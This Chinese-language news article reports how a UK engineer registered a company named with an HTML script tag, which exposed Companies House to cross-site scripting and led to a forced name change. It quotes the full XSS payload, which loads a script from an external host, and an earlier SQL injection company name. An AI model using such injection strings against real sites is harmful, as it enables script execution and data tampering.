使用 HTML 代码作为公司名称，登记局易被攻击：被迫更换

Posted 2021-06-11 云头条

英国公司注册处 Companies House的发言人表示，公司名称中含有html代码中所使用的字符可能会带来安全风险。

后来意识到可能会带来安全隐患后，已迫使这家公司更改名称。

这家公司由一名英国软件工程师创建，最初的名称是““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”。

更改后的名称是“THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”， 翻译过来就是“名称中过去含有HTML脚本标记的那家公司”。

该工程师表示，他之所以取“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD这个名称，纯粹是由于自己觉得这对他公司的咨询业务而言是个“有趣又好玩的名称”。

他现在表示，他起初没有意识到Companies House实际上很容易受到他使用的名为“跨站点脚本”这种极其简单的技术的攻击，跨站点脚本让攻击者可以在一个网站上运行来自另一个网站的代码。

如果名称以引号和V形图案开头，任何无法正确处理HTML代码的网站都会误以为这个公司名称是空的，然后从XSS Hunter网站加载并执行脚本，该网站可帮助开发人员找到跨站脚本错误。

该脚本原来只是会发出无害的警报，但它相当于证明了恶意攻击者可以改而利用同样的漏洞作为入口点，以达到更具破坏性的目的。

过去已经注册过类似的名称，比如“; DROP TABLE “COMPANIES”;-- LTD”，这是企图执行一种名为SQL注入攻击的攻击（灵感源自著名的XKCD网络漫画），但这是第一个引起反响的此类名称。Companies House已追根溯源，从其数据库中删除了这个原始名称，所有引用该原始名称的文档现在都简单地标为“可根据要求提供的公司名称”。